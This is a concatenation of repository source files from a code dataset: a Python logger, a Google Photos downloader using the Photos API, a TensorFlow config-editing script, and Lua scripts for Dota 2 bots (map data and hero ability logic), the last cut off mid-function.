"alphanum_fraction": 0.6632756590843201,
"avg_line_length": 26.19444465637207,
"blob_id": "05e4f73df8d2ecded518f2e3682497d68337a61b",
"content_id": "88b736a6cd98b76d8001b5621bccc3f1a35cf226",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 983,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 36,
"path": "/app/logger.py",
"repo_name": "akamuinsaner/memo_backend",
"src_encoding": "UTF-8",
"text": "import os\nimport logging\n\ndef config_logger(name, level, log_file_name):\n # define log path\n log_path = './logs'\n\n # create logger\n logger = logging.getLogger(name)\n level = getattr(logging, level.upper(), logging.NOTSET)\n logger.setLevel(level)\n\n if not os.path.exists(log_path):\n os.makedirs(log_path)\n file_path = os.path.join(log_path, log_file_name)\n\n #add file handler print log to file\n fh = logging.FileHandler(file_path)\n fh.setLevel(logging.DEBUG)\n\n #add stream handler print log to terminal\n ch = logging.StreamHandler()\n ch.setLevel(logging.DEBUG)\n\n #set formatter\n fmt = \"%(asctime)-15s %(levelname)s %(filename)s %(lineno)d %(process)d %(message)s\"\n datefmt = \"%a %d %b %Y %H:%M:%S\"\n formatter = logging.Formatter(fmt, datefmt)\n\n # add handler and formatter to logger\n fh.setFormatter(formatter)\n ch.setFormatter(formatter)\n logger.addHandler(fh)\n logger.addHandler(ch)\n\n return logger\n "
}
] | 14 |
gm2015/GooglePhotosArchiver
|
https://github.com/gm2015/GooglePhotosArchiver
|
1f3bd60fe1f5be8b8e33a4cddd410e9d147359c9
|
c3f81dfdcb4e3f6ffdd060f85ec97f275077fc69
|
1feaeb9eb311392625e20ba1ac43df8de3423e3c
|
refs/heads/master
| 2022-03-27T19:12:27.670788 | 2020-01-06T15:44:27 | 2020-01-06T15:44:27 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7704485654830933,
"alphanum_fraction": 0.7955145239830017,
"avg_line_length": 46.375,
"blob_id": "c1b954061d9173d01dc997ac5d689b28875e2ac0",
"content_id": "244a7f4c40ae96608026b5e6aa2cd57cd09346cc",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 758,
"license_type": "permissive",
"max_line_length": 234,
"num_lines": 16,
"path": "/README.md",
"repo_name": "gm2015/GooglePhotosArchiver",
"src_encoding": "UTF-8",
"text": "# Google Photos Archiver\n# How to Use\n### Needed Software:\n[Python 3](https://www.python.org/downloads/ \"Python 3\")\n**OR**\n[Win10 64bit Executable](https://github.com/NicholasDawson/GooglePhotosArchiver/raw/master/Google%20Photos%20Archiver.exe)\n\n### Needed Python Libraries:\n(Install using pip)\n- googleapiclient\n- google_auth_oauthlib\n- google\n\n## Full Instructions\n1. Install python and the necessary libraries and download this repository, or download the 64bit executable version of the application to run on windows.\n2. Follow the instructions in this [Google Slides Presentation](https://docs.google.com/presentation/d/1nrNmM6iUSPXU5C9DjxG9gyaAAFKYXuMMeQVxqBYyRMM/edit?usp=sharing \"Link\"). It is very detailed and includes screenshots for everything.\n"
},
{
"alpha_fraction": 0.649773359298706,
"alphanum_fraction": 0.653481662273407,
"avg_line_length": 33.661766052246094,
"blob_id": "349890b4f979b811e7641a97ad7c24f9e990dfb3",
"content_id": "fef97208fc44d5a28fcdcfb25a7da1f5bf763dc0",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2427,
"license_type": "permissive",
"max_line_length": 88,
"num_lines": 68,
"path": "/google_photos_archiver.py",
"repo_name": "gm2015/GooglePhotosArchiver",
"src_encoding": "UTF-8",
"text": "import os\r\nfrom googleapiclient.discovery import build\r\nfrom google_auth_oauthlib.flow import InstalledAppFlow\r\nfrom google.auth.transport.requests import Request\r\nimport pickle\r\nfrom urllib.request import urlretrieve as download\r\n\r\n\r\n# Define Scopes for Application\r\nSCOPES = ['https://www.googleapis.com/auth/photoslibrary']\r\n\r\ndef get_service():\r\n # The file photos_token.pickle stores the user's access and refresh tokens, and is\r\n # created automatically when the authorization flow completes for the first\r\n # time.\r\n creds = None\r\n\r\n if os.path.exists('photoslibrary_token.pickle'):\r\n with open('photoslibrary_token.pickle', 'rb') as token:\r\n creds = pickle.load(token)\r\n # If there are no (valid) credentials available, let the user log in.\r\n if not creds or not creds.valid:\r\n if creds and creds.expired and creds.refresh_token:\r\n creds.refresh(Request())\r\n else:\r\n flow = InstalledAppFlow.from_client_secrets_file('credentials.json', SCOPES)\r\n creds = flow.run_local_server()\r\n # Save the credentials for the next run\r\n with open('photoslibrary_token.pickle', 'wb') as token:\r\n pickle.dump(creds, token)\r\n\r\n return build('photoslibrary', 'v1', credentials=creds)\r\n\r\ndef download_images(media_items, media_num):\r\n for x in media_items:\r\n if 'image' in x['mimeType']:\r\n url = x['baseUrl'] + '=d'\r\n else:\r\n url = x['baseUrl'] + '=dv'\r\n filename = str(media_num) + '_' + x['filename']\r\n print('Downloading ' + filename)\r\n download(url, 'Google Photos Library/' + filename)\r\n media_num += 1\r\n return media_num\r\n\r\n\r\n# Get API Service\r\nprint('Getting API Service...')\r\nservice = get_service()\r\nprint('API Service loaded.')\r\n\r\n# Find and Download Media\r\nif not os.path.exists('Google Photos Library'):\r\n os.makedirs('Google Photos Library')\r\n\r\nresults = service.mediaItems().list(pageSize=100).execute()\r\nmedia_num = download_images(results['mediaItems'], 0)\r\nnext = results['nextPageToken']\r\n\r\nwhile True:\r\n results = service.mediaItems().list(pageSize=100, pageToken=next).execute()\r\n media_num = download_images(results['mediaItems'], media_num)\r\n try:\r\n next = results['nextPageToken']\r\n except KeyError:\r\n break\r\nprint('All Media Has Been Downloaded.')\r\nprint(media_num + ' items have been downloaded.')\r\n\r\n"
}
] | 2 |
Muneeb-Ahmed-Khan/muneebRepo
|
https://github.com/Muneeb-Ahmed-Khan/muneebRepo
|
b4a5a4132dc0fe808c0b1debf40ec5a2b564b99e
|
c02002875b388b50d1c1395d70fedc204169312c
|
080f967bfbd3cf74cd1b508326648e44710f6cbd
|
refs/heads/master
| 2020-12-21T10:28:55.172579 | 2020-01-29T10:27:52 | 2020-01-29T10:27:52 | 236,403,050 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6893543004989624,
"alphanum_fraction": 0.724258303642273,
"avg_line_length": 94.5,
"blob_id": "7f6f25dcebefb38e45bac43e2cc46c1977402e79",
"content_id": "7ee350405beb569bb93993a6e7f56b1a5334200f",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1146,
"license_type": "permissive",
"max_line_length": 201,
"num_lines": 12,
"path": "/config_edit.py",
"repo_name": "Muneeb-Ahmed-Khan/muneebRepo",
"src_encoding": "UTF-8",
"text": "import re\nfilename = 'C:/tensorflow_env/models/research/object_detection/muneebRepo/training/faster_rcnn_inception_v2_pets.config'\nwith open(filename) as f:\n s = f.read()\nwith open(filename, 'w') as f:\n s = re.sub('37', '1', s) #number of classes to train for, default was 37 so , i substituted it with 1. which is how many i am using\n s = re.sub('PATH_TO_BE_CONFIGURED/model.ckpt', '/content/models/research/object_detection/faster_rcnn_inception_v2_coco_2018_01_28/model.ckpt', s)\n s = re.sub('PATH_TO_BE_CONFIGURED/pet_faces_train.record-\\?\\?\\?\\?\\?-of-00010', '/content/models/research/object_detection/muneebRepo/train.record', s)\n s = re.sub('PATH_TO_BE_CONFIGURED/pet_faces_val.record-\\?\\?\\?\\?\\?-of-00010', '/content/models/research/object_detection/muneebRepo/test.record', s)\n s = re.sub('PATH_TO_BE_CONFIGURED/pet_label_map.pbtxt', '/content/models/research/object_detection/muneebRepo/training/label_map.pbtxt', s)\n s = re.sub('1101', '105', s) #number of test examples. number of pictures in test folder , default was 1101 . i replaced it with 105, whcih are how many pictures i am currently using in this dataset\n f.write(s)\n"
},
{
"alpha_fraction": 0.8055555820465088,
"alphanum_fraction": 0.8055555820465088,
"avg_line_length": 17,
"blob_id": "a993f25b855ddfd73939b4b866fce1373fe19811",
"content_id": "def1093014208a578750d3898d0da0002a8245ad",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 36,
"license_type": "permissive",
"max_line_length": 22,
"num_lines": 2,
"path": "/README.md",
"repo_name": "Muneeb-Ahmed-Khan/muneebRepo",
"src_encoding": "UTF-8",
"text": "# muneebRepo\n Helper for Tensorflow\n"
}
] | 2 |
vpus/vpesports-enhanced-bot
|
https://github.com/vpus/vpesports-enhanced-bot
|
b3fe75972440b15da6143895f861ca061deed079
|
8c5ca0b33d609c5fc1bcd2474540bb83cfe929f1
|
6332faedce3accc52ed0da6ced845cf1a9aecbd3
|
refs/heads/master
| 2021-04-09T14:11:15.082682 | 2018-05-09T23:41:18 | 2018-05-09T23:41:18 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.4463161826133728,
"alphanum_fraction": 0.5749722123146057,
"avg_line_length": 18.021127700805664,
"blob_id": "5eb4b8aa624ba83491ba379e97547df2b295a3cb",
"content_id": "a32504d28cc6e0bec8e7904c505f4e2ba19c3e72",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Lua",
"length_bytes": 5402,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 284,
"path": "/UtilityData.lua",
"repo_name": "vpus/vpesports-enhanced-bot",
"src_encoding": "UTF-8",
"text": "------------------------------------ Variable ----------------------------------\ntotal_prox = 0;\ntotal_remotes = 0;\ntotal_stasis = 0;\n\n-- Keep a reference to each mine\nremoteMines = {};\n-- proxMines = {};\n------------------------------------- Final ------------------------------------\n-- Get all player IDs\nrad_player_ids = GetTeamPlayers(TEAM_RADIANT);\ndir_player_ids = GetTeamPlayers(TEAM_DIRE);\n\n-- Modes for Farming\nEARLY_MINING = 0;\nEARLY_STACKING = 1;\nCONSIDER_CAMP = 2;\nATTACK_CAMP = 3;\n\nteams = {\n\tTEAM_RADIANT,\n\tTEAM_DIRE,\n\tTEAM_NEUTRAL,\n\tTEAM_NONE\n};\n\nmodes = {\n\t[\"none\"] = BOT_MODE_NONE,\n\t[\"lane\"] = BOT_MODE_LANING,\n\t[\"attack\"] = BOT_MODE_ATTACK,\n\t[\"roam\"] = BOT_MODE_ROAM,\n\t[\"retreat\"] = BOT_MODE_RETREAT,\n\t[\"secret\"] = BOT_MODE_SECRET_SHOP,\n\t[\"side\"] = BOT_MODE_SIDE_SHOP,\n\t[\"push_top\"] = BOT_MODE_PUSH_TOWER_TOP,\n\t[\"push_mid\"] = BOT_MODE_PUSH_TOWER_MID,\n\t[\"push_bot\"] = BOT_MODE_PUSH_TOWER_BOT,\n\t[\"defend_top\"] = BOT_MODE_DEFEND_TOWER_TOP,\n\t[\"defend_mid\"] = BOT_MODE_DEFEND_TOWER_MID,\n\t[\"defend_bot\"] = BOT_MODE_DEFEND_TOWER_BOT,\n\t[\"assemble\"] = BOT_MODE_ASSEMBLE,\n\t[\"team_roam\"] = BOT_MODE_TEAM_ROAM,\n\t[\"farm\"] = BOT_MODE_FARM,\n\t[\"defend_ally\"] = BOT_MODE_DEFEND_ALLY,\n\t[\"evasive\"] = BOT_MODE_EVASIVE_MANEUVERS,\n\t[\"roshan\"] = BOT_MODE_ROSHAN,\n\t[\"item\"] = BOT_MODE_ITEM,\n\t[\"ward\"] = BOT_MODE_WARD\n};\n\ndesires = {\n\tBOT_MODE_DESIRE_NONE,\n\tBOT_MODE_DESIRE_VERYLOW,\n\tBOT_MODE_DESIRE_LOW,\n\tBOT_MODE_DESIRE_MODERATE,\n\tBOT_MODE_DESIRE_HIGH,\n\tBOT_MODE_DESIRE_VERYHIGH,\n\tBOT_MODE_DESIRE_ABSOLUTE\n};\n\nactions = {\n\t[\"none\"] = BOT_ACTION_TYPE_NONE,\n\t[\"idle\"] = BOT_ACTION_TYPE_IDLE,\n\t[\"move_to\"] = BOT_ACTION_TYPE_MOVE_TO,\n\t[\"attack\"] = BOT_ACTION_TYPE_ATTACK,\n\t[\"attack_move\"] = BOT_ACTION_TYPE_ATTACKMOVE,\n\t[\"ability\"] = BOT_ACTION_TYPE_USE_ABILITY,\n\t[\"pick_rune\"] = BOT_ACTION_TYPE_PICK_UP_RUNE,\n\t[\"pick_item\"] = BOT_ACTION_TYPE_PICK_UP_ITEM,\n\t[\"drop_item\"] = BOT_ACTION_TYPE_DROP_ITEM,\n\t[\"shrine\"] = BOT_ACTION_TYPE_SHRINE,\n\t[\"delay\"] = BOT_ACTION_TYPE_DELAY\n};\n\nactionsTEST = {\n\t[BOT_ACTION_TYPE_NONE] = \"None\",\n\t[BOT_ACTION_TYPE_IDLE] = \"Idle\",\n\t[BOT_ACTION_TYPE_MOVE_TO] = \"Move To\",\n\t[BOT_ACTION_TYPE_ATTACK] = \"Attack\",\n\t[BOT_ACTION_TYPE_ATTACKMOVE] = \"Attack Move\",\n\t[BOT_ACTION_TYPE_USE_ABILITY] = \"Use Ability\",\n\t[BOT_ACTION_TYPE_PICK_UP_RUNE] = \"Pick Rune\",\n\t[BOT_ACTION_TYPE_PICK_UP_ITEM] = \"Pick Item\",\n\t[BOT_ACTION_TYPE_DROP_ITEM] = \"Drop Item\",\n\t[BOT_ACTION_TYPE_SHRINE] = \"Shrine\",\n\t[BOT_ACTION_TYPE_DELAY] = \"Delay\"\t\n};\n\ntowers = {\n\tTOWER_TOP_1,\n\tTOWER_MID_1,\n\tTOWER_BOT_1,\n\tTOWER_TOP_2,\n\tTOWER_MID_2,\n\tTOWER_BOT_2,\n\tTOWER_TOP_3,\n\tTOWER_MID_3,\n\tTOWER_BOT_3,\n\tTOWER_BASE_1,\n\tTOWER_BASE_2\n}\n\nrad_early_remote_locs = {\n\tVector(-6000, 3800),\n\tVector(-2800, 4300),\n\tVector(-900, -1200),\n\tVector(800, 500),\n\tVector(3600, 800),\n\tVector(-1700, 1100),\n\tVector(2600, -2000)\n};\n\nrad_late_remote_locs = {\n\tVector(4000, 3500),\n\tVector(5000, 4200),\n\tVector(3100, 5800),\n\tVector(6300, 2600),\n\tVector(-1700, 1100),\n\tVector(2600, -2000)\n};\n\nrad_base_remote_locs = {\n\tVector(-6600, -3500),\n\tVector(-4700, -4200),\n\tVector(-4100, -6100),\n\tVector(-5600, -4700),\n\tVector(-5200, -5100)\n};\n\ndir_early_remote_locs = {\n\tVector(6000, 3400),\n\tVector(5200, -4000),\n\tVector(3500, -5200),\n\tVector(-1700, 1100),\n\tVector(2600, -2000)\n};\n\ndir_late_remote_locs = {\n\tVector(4000, 3500),\n\tVector(-1700, 1100),\n\tVector(2600, -2000)\n};\n\ndir_base_remote_locs = {\n\tVector(3700, 5700),\n\tVector(4400, 3800),\n\tVector(6300, 3100),\n\tVector(4800, 4800),\n\tVector(5300, 4300)\n};\n\nrad_fountain = Vector(-6700, -6200);\ndir_fountain = Vector(6600, 6000);\n\nradiant_camp_locs = {\n\t{\n\t\tVector(2800, -4550), -- Where Neutrals spawn\n\t\tVector(3500, -4500), -- Where to plant a mine\n\t\t1,\n\t\tVector(4300, -4000), -- Where to run away to\n\t\tfalse -- Are the neutrals dead? When did they die?\n\t},\n\t{\n\t\tVector(-3600, 850),\n\t\tVector(-4400, 600),\n\t\t2,\n\t\tVector(-5500, 1500),\n\t\tfalse\n\t},\n\t{\n\t\tVector(-1800, -4500),\n\t\tVector(-1800, -3700),\n\t\t2,\n\t\tVector(-1700, -3100),\n\t\tfalse\n\t},\n\t{\n\t\tVector(300, -4700),\n\t\tVector(1150, -4500),\n\t\t2,\n\t\tVector(2000, -4000),\n\t\tfalse\n\t},\n\t{\n\t\tVector(-4700, -400), \n\t\tVector(-4800, 300),\n\t\t3,\n\t\tVector(-4700, 800),\n\t\tfalse\n\t},\n\t{\n\t\tVector(-350, -3400),\n\t\tVector(-900, -2900),\n\t\t3,\n\t\tVector(-1600, -2900),\n\t\tfalse\n\t},\n\t{\n\t\tVector(4800, -4500),\n\t\tVector(4600, -3800),\n\t\t3,\n\t\tVector(4400, -3400),\n\t\tfalse\n\t},\n\t{\n\t\tVector(-3000, -100),\n\t\tVector(-2400, 300),\n\t\t4,\n\t\tVector(-1500, 1000),\n\t\tfalse\n\t},\n\t{\n\t\tVector(100, -1900),\n\t\tVector(600, -2100),\n\t\t4,\n\t\tVector(1600, -2400),\n\t\tfalse\n\t},\n};\n\ndire_camp_locs = {\n\t{\n\t\tVector(4400, 800),\n\t\tVector(-2900, 5250),\n\t\t1\n\t},\n\t{\n\t\tVector(4400, 800),\n\t\tVector(3000, -200),\n\t\t2\n\t},\n\t{\n\t\tVector(4400, 800),\n\t\tVector(1300, 3950),\n\t\t2\n\t},\n\t{\n\t\tVector(4400, 800),\n\t\tVector(-1400, -4350),\n\t\t2\n\t},\n\t{\n\t\tVector(4400, 800),\n\t\tVector(3950, 750),\n\t\t3\n\t},\n\t{\n\t\tVector(4400, 800),\n\t\tVector(-400, 3700),\n\t\t3\n\t},\n\t{\n\t\tVector(4400, 800),\n\t\tVector(-4850, 3950),\n\t\t3\n\t},\n\t{\n\t\tVector(4400, 800),\n\t\tVector(3800, -1000),\n\t\t4\n\t},\n\t{\n\t\tVector(4400, 800),\n\t\tVector(-700, 2800),\n\t\t4\n\t},\n}\n\ntop_lane = {\n\tVector(-6600, -3300),\n\tVector(-6000, 5700),\n\tVector(3300, 5800)\n};\n\nmid_lane = {\n\tVector(-4400, -4000),\n\tVector(4100, 3500)\t\n};\n\nbot_lane = {\n\tVector(-3800, -6000),\n\tVector(5900, -6000),\n\tVector(6300, 2800)\t\n};\n"
},
{
"alpha_fraction": 0.614311695098877,
"alphanum_fraction": 0.6188598871231079,
"avg_line_length": 33.726314544677734,
"blob_id": "0bebb83e29d290e66ab0b1590f647bfe1f4f703d",
"content_id": "8f097feb6f280c685b3872be646d3a14ca2bc0ee",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Lua",
"length_bytes": 3298,
"license_type": "no_license",
"max_line_length": 165,
"num_lines": 95,
"path": "/mode_attack_huskar.lua",
"repo_name": "vpus/vpesports-enhanced-bot",
"src_encoding": "UTF-8",
"text": "local npcBot = GetBot()\nlocal botTeam = GetTeam()\n\nfunction Think()\n local idle = true\n\n if npcBot:HasModifier(\"modifier_huskar_life_break_charge\") and not npcBot:HasModifier(\"modifier_huskar_inner_vitality\") and inner_vitality:IsFullyCastable() then\n print(\"Ability : Using Inner Vitality while Life Break\")\n npcBot:Action_UseAbilityOnEntity(inner_vitality, npcBot)\n local armletSlot = npcBot:FindItemSlot(\"item_armlet\")\n local armlet = nil\n if npcBot:GetItemSlotType(armletSlot) == ITEM_SLOT_TYPE_MAIN then\n armlet = npcBot:GetItemInSlot(armletSlot)\n end\n if armlet ~= nil then\n if not npcBot:HasModifier(\"modifier_item_armlet_unholy_strength\") then\n if armlet:IsFullyCastable() then\n npcBot:Action_UseAbility(armlet)\n end\n end\n end\n\n local bkbSlot = npcBot:FindItemSlot(\"item_black_king_bar\")\n local bkb = nil\n if npcBot:GetItemSlotType(bkbSlot) == ITEM_SLOT_TYPE_MAIN then\n bkb = npcBot:GetItemInSlot(bkbSlot)\n end\n if bkb ~= nil then\n if bkb:IsFullyCastable() then\n npcBot:Action_UseAbility(bkb)\n end\n end\n idle = false\n end\n\n if not burning_spear:GetAutoCastState() then\n -- print(\"Toggle it ON\")\n burning_spear:ToggleAutoCast()\n end\n\n if life_break ~= nil and life_break:IsFullyCastable() then\n local nearbyEnemies = npcBot:GetNearbyHeroes(1200, true, BOT_MODE_NONE)\n local weakerEnemy = nil\n\n for k, enemy in pairs(nearbyEnemies) do\n if weakerEnemy == nil then\n weakerEnemy = enemy\n else\n if enemy:GetHealth() < weakerEnemy:GetHealth() and not enemy:HasModifier(\"modifier_item_blade_mail_reflect\") then\n weakerEnemy = enemy\n end\n end\n end\n\n print(\"Ability : Using Life Break\")\n npcBot:Action_UseAbilityOnEntity(life_break, weakerEnemy)\n idle = false\n end\n\n -- inner vatality think --\n if not npcBot:HasModifier(\"modifier_huskar_inner_vitality\") and inner_vitality:IsFullyCastable() then\n print(\"Ability : Using Inner Vitality while Life Break\")\n npcBot:Action_UseAbilityOnEntity(inner_vitality, npcBot)\n idle = false\n end\n\n -- attack think --\n local nearbyEnemies = npcBot:GetNearbyHeroes(900, true, BOT_MODE_NONE)\n local targetEnemy = nil\n\n for k, enemy in pairs(nearbyEnemies) do\n if targetEnemy == nil then\n targetEnemy = enemy\n else\n if enemy:GetHealth() < targetEnemy:GetHealth() and not enemy:HasModifier(\"modifier_item_blade_mail_reflect\") and not enemy:IsAttackImmune() then\n targetEnemy = enemy\n end\n end\n end\n\n if targetEnemy ~= nil then\n npcBot:Action_AttackUnit(targetEnemy, true)\n idle = false\n end\n\n if idle then\n if npcBot:GetHealth() > 500 then\n local nearbyEnemies = npcBot:GetNearbyHeroes(3000, true, BOT_MODE_NONE)\n npcBot:Action_AttackUnit(nearbyEnemies[1], true)\n else\n npcBot:Action_MoveToLocation(GetAncient(GetTeam()):GetLocation())\n end\n end\n\nend"
},
{
"alpha_fraction": 0.7481481432914734,
"alphanum_fraction": 0.7518518567085266,
"avg_line_length": 23.57575798034668,
"blob_id": "22acb8c71c0599b42383f98e3044a2ead2e5c423",
"content_id": "eb4d923b3cb90f502df7f8b3f7079f3ab2c5dfee",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Lua",
"length_bytes": 810,
"license_type": "no_license",
"max_line_length": 65,
"num_lines": 33,
"path": "/mode_secret_shop_legion_commander.lua",
"repo_name": "vpus/vpesports-enhanced-bot",
"src_encoding": "UTF-8",
"text": "local npcBot = GetBot()\nlocal botTeam = npcBot:GetTeam()\n\nfunction GetDesire()\n\tif npcBot.secretShop then\n\t\treturn _G.desires[7]\n\tend\n\t\n\treturn _G.desires[1]\nend\n\nfunction Think()\n\tlocal secretShopLoc = GetShopLocation(botTeam, SHOP_SECRET)\n\tlocal bootsSlot = npcBot:FindItemSlot(\"item_travel_boots\")\n\tlocal boots = nil\n\tif npcBot:GetItemSlotType(bootsSlot) == ITEM_SLOT_TYPE_MAIN then\n\t\tboots = npcBot:GetItemInSlot(bootsSlot)\n\tend\n\n\tlocal secretDist = npcBot:DistanceFromSecretShop()\n\t\n\tif secretDist > 0 then\n\t\tif boots ~= nil and not npcBot:IsChanneling() then\n\t\t\tif boots:IsFullyCastable() then\n\t\t\t\tnpcBot:Action_UseAbilityOnLocation(boots, secretShopLoc)\n\t\t\tend\n\t\telseif not npcBot:IsChanneling() then\n\t\t\tnpcBot:Action_MoveToLocation(secretShopLoc)\n\t\tend\n\telse\n\t\tnpcBot.secretShop = false\n\tend\nend"
},
{
"alpha_fraction": 0.5510541200637817,
"alphanum_fraction": 0.5588263869285583,
"avg_line_length": 44.348018646240234,
"blob_id": "f2e9e5daca829e68be79b0643462997d37f4dea4",
"content_id": "4e27de71aaae7fe525558f6e826cf898cb11c72a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Lua",
"length_bytes": 10293,
"license_type": "no_license",
"max_line_length": 157,
"num_lines": 227,
"path": "/ability_item_usage_keeper_of_the_light.lua",
"repo_name": "vpus/vpesports-enhanced-bot",
"src_encoding": "UTF-8",
"text": "local build = require(GetScriptDirectory()..\"/item_build_keeper_of_the_light\")\nrequire(GetScriptDirectory()..\"/UtilityData\")\nrequire(GetScriptDirectory()..\"/UtilityFunctions\")\n\nlocal npcBot = GetBot()\nlocal botTeam = GetTeam()\nlocal lane_claim = true\n\nfunction AbilityLevelUpThink()\n local skillsToLevel = build[\"skills\"]\n-- if npcBot:GetAbilityPoints() < 1 or (GetGameState() ~= GAME_STATE_PRE_GAME \n-- \tand GetGameState() ~= GAME_STATE_GAME_IN_PROGRESS) then\n-- return\n-- end\n if npcBot:GetAbilityPoints() > 0 and skillsToLevel[1] ~= \"-1\" \n \tand skillsToLevel[1] ~= nil then\n \tnpcBot:ActionImmediate_LevelAbility(skillsToLevel[1])\n \ttable.remove(skillsToLevel, 1)\n end\nend\n\nfunction AbilityUsageThink()\n local botMana = npcBot:GetMana()\n local botHealth = npcBot:GetHealth()\n local bot_location_x = npcBot:GetLocation()[1]\n local bot_location_y = npcBot:GetLocation()[2]\n local action = npcBot:GetCurrentActionType()\n local action_mode = npcBot:GetActiveMode()\n\n local illuminate = npcBot:GetAbilityByName(\"keeper_of_the_light_illuminate\")\n local illuminate_end = npcBot:GetAbilityByName(\"keeper_of_the_light_illuminate_end\")\n local manaleak = npcBot:GetAbilityByName(\"keeper_of_the_light_mana_leak\")\n local chakra = npcBot:GetAbilityByName(\"keeper_of_the_light_chakra_magic\")\n local spiritform = npcBot:GetAbilityByName(\"keeper_of_the_light_spirit_form\")\n local recall = npcBot:GetAbilityByName(\"keeper_of_the_light_recall\")\n local blinding = npcBot:GetAbilityByName(\"keeper_of_the_light_blinding_light\")\n local spirit_illuminate = npcBot:GetAbilityByName(\"keeper_of_the_light_spirit_form_illuminate\")\n\n if npcBot:IsChanneling() then\n local nearbyEnemies_400 = npcBot:GetNearbyHeroes(400, true, BOT_MODE_NONE)\n if #nearbyEnemies_400 > 1 then\n npcBot:Action_UseAbility(illuminate_end)\n else\n npcBot:ActionQueue_UseAbilityOnLocation(illuminate,npcBot:GetLocation())\n end\n end\n\n if action ~= BOT_ACTION_TYPE_USE_ABILITY and action ~= BOT_ACTION_TYPE_ATTACK then\n -- chakra think --\n if chakra ~= nil and chakra:IsFullyCastable() then\n if botMana < 200 then\n npcBot:Action_UseAbilityOnEntity(chakra, npcBot)\n print(\"Ability : Using Chakra on SELF\")\n else\n local alliedHeroes = GetUnitList(UNIT_LIST_ALLIED_HEROES)\n local potential_target_hero = \"\"\n local potential_hero_mana = 4000\n for i, alliedHero in ipairs(alliedHeroes) do\n heroName = alliedHero:GetUnitName()\n if heroName ~= \"npc_dota_hero_keeper_of_the_light\" then\n distance = GetUnitToUnitDistance(npcBot, alliedHero)\n if distance < 1800 then\n ally_mana = alliedHero:GetMana()\n ally_max_mana = alliedHero:GetMaxMana()\n ally_mana_lose = ally_max_mana - ally_mana\n if ally_mana < potential_hero_mana and ally_mana_lose > 200 then\n potential_target_hero = alliedHero\n potential_hero_mana = ally_mana\n end\n end\n end\n end\n if potential_target_hero ~= \"\" then\n npcBot:ActionQueue_UseAbilityOnEntity(chakra, potential_target_hero)\n print(\"Ability in Queue : Using Chakra on someone\")\n end\n end \n end\n\n -- illuminate think --\n if action ~= BOT_ACTION_TYPE_MOVE_TO and action ~= BOT_ACTION_TYPE_USE_ABILITY then\n local nearbyCreeps = npcBot:GetNearbyLaneCreeps(1000, true)\n local nearbyEnemies = npcBot:GetNearbyHeroes(1600, true, BOT_MODE_NONE)\n local nearestEnemy = nil\n\n for k,enemy in pairs(nearbyEnemies) do\n if nearestEnemy == nil then\n nearestEnemy = enemy\n else\n if GetUnitToUnitDistance(nearestEnemy, npcBot) > GetUnitToUnitDistance(enemy, npcBot) then\n nearestEnemy = enemy\n end\n end\n end\n\n if illuminate ~= nil and illuminate:IsFullyCastable() and (#nearbyCreeps >= 2 or #nearbyEnemies >= 2) then\n local target = nil\n if #nearbyCreeps > 0 then\n target = nearbyCreeps[1]\n else\n target = nearestEnemy\n end\n if botTeam == 2 then\n local illuminateLoc = _G.getVectorBetweenTargetPercentage(npcBot, target, 0.8)\n if UnderSpiritFrom() then\n print(\"Ability in Queue : Once Casting Illuminate\", botTeam)\n npcBot:Action_UseAbilityOnLocation(spirit_illuminate, illuminateLoc)\n else\n print(\"Ability in Queue : Casting Illuminate\", botTeam)\n for i=1, 10 do\n npcBot:ActionQueue_UseAbilityOnLocation(illuminate, illuminateLoc)\n end\n end\n else\n local illuminateLoc = _G.getVectorBetweenTargetPercentage(target, npcBot, 0.8)\n if UnderSpiritFrom() then\n print(\"Ability in Queue : Once Casting Illuminate\", botTeam)\n npcBot:Action_UseAbilityOnLocation(spirit_illuminate, illuminateLoc)\n else\n print(\"Ability in Queue : Casting Illuminate\", botTeam)\n for i=1, 10 do\n npcBot:ActionQueue_UseAbilityOnLocation(illuminate, illuminateLoc)\n end\n end\n end\n end\n end\n\n -- spiritform think --\n if action ~= BOT_ACTION_TYPE_MOVE_TO and action ~= BOT_ACTION_TYPE_USE_ABILITY and not UnderSpiritFrom() then\n if npcBot:HasModifier(\"modifier_keeper_of_the_light_spirit_form\") and spiritform ~= nil and spiritform:IsFullyCastable() then\n npcBot:ActionQueue_UseAbility(spiritform)\n print(\"Ability in Queue : Entering Spirit Form\")\n end\n end\n\n -- manaleak think --\n if action_mode == BOT_MODE_ATTACK or action_mode == BOT_MODE_RETREAT then\n local nearbyEnemies = npcBot:GetNearbyHeroes(1600, true, BOT_MODE_NONE)\n local nearestEnemy = nil\n for k,enemy in pairs(nearbyEnemies) do\n if nearestEnemy == nil then\n nearestEnemy = enemy\n else\n if GetUnitToUnitDistance(nearestEnemy, npcBot) > GetUnitToUnitDistance(enemy, npcBot) then\n nearestEnemy = enemy\n end\n end\n end\n\n if action_mode == BOT_MODE_ATTACK and #nearbyEnemies > 1 then\n local alliedHeroes = GetUnitList(UNIT_LIST_ALLIED_HEROES)\n local potential_target_hero = nil\n local potential_hero_distance = 0\n for i, alliedHero in ipairs(alliedHeroes) do\n local heroName = alliedHero:GetUnitName()\n if heroName ~= \"npc_dota_hero_keeper_of_the_light\" then\n distance = GetUnitToUnitDistance(npcBot, alliedHero)\n if distance > 1200 and alliedHero:GetHealth()/alliedHero:GetMaxHealth()>0.8 and alliedHero:GetMana()/alliedHero:GetMaxMana()>0.8 then\n if potential_target_hero == nil then\n potential_target_hero = alliedHero\n potential_hero_distance = distance\n else\n if distance > potential_hero_distance then\n potential_target_hero = alliedHero\n 